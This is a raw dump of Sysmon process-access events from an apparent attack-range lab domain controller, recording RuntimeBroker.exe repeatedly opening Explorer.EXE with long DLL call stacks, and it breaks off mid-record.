10341000x800000000000000013092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+